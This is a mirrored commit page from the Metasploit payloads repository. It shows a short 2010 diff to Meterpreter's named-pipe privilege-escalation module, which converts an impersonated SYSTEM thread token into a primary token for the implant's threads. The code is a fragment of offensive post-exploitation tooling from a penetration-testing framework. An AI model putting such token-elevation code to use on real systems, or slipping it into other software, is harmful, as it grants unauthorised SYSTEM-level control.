github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00
Code Releases Activity

Switch the namedpipe code to convert the thread token to a primary token first

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@9756 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2010-07-09 21:40:44 +00:00
parent 869ff5fb70
commit 286d331727
1 changed files with 6 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
c/meterpreter/source/extensions/priv/server/elevate/namedpipe.c
View File

@ -11,6 +11,7 @@ DWORD THREADCALL elevate_namedpipe_thread( THREAD * thread )
DWORD dwResult = ERROR_ACCESS_DENIED;
HANDLE hServerPipe = NULL;
HANDLE hToken = NULL;
HANDLE hTokenDup = NULL;
char * cpServicePipe = NULL;
Remote * remote = NULL;
BYTE bMessage[128] = {0};
@ -60,9 +61,13 @@ DWORD THREADCALL elevate_namedpipe_thread( THREAD * thread )
if( !OpenThreadToken( GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken ) )
CONTINUE_ON_ERROR( "[ELEVATE] elevate_namedpipe_thread. OpenThreadToken failed" );
// duplicate it into a primary token
if( ! DuplicateTokenEx( hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hTokenDup ) )
CONTINUE_ON_ERROR( "[ELEVATE] elevate_namedpipe_thread. DuplicateTokenEx failed" );
// now we can set the meterpreters thread token to that of our system
// token so all subsequent meterpreter threads will use this token.
core_update_thread_token( remote, hToken );
core_update_thread_token( remote, hTokenDup );
dwResult = ERROR_SUCCESS;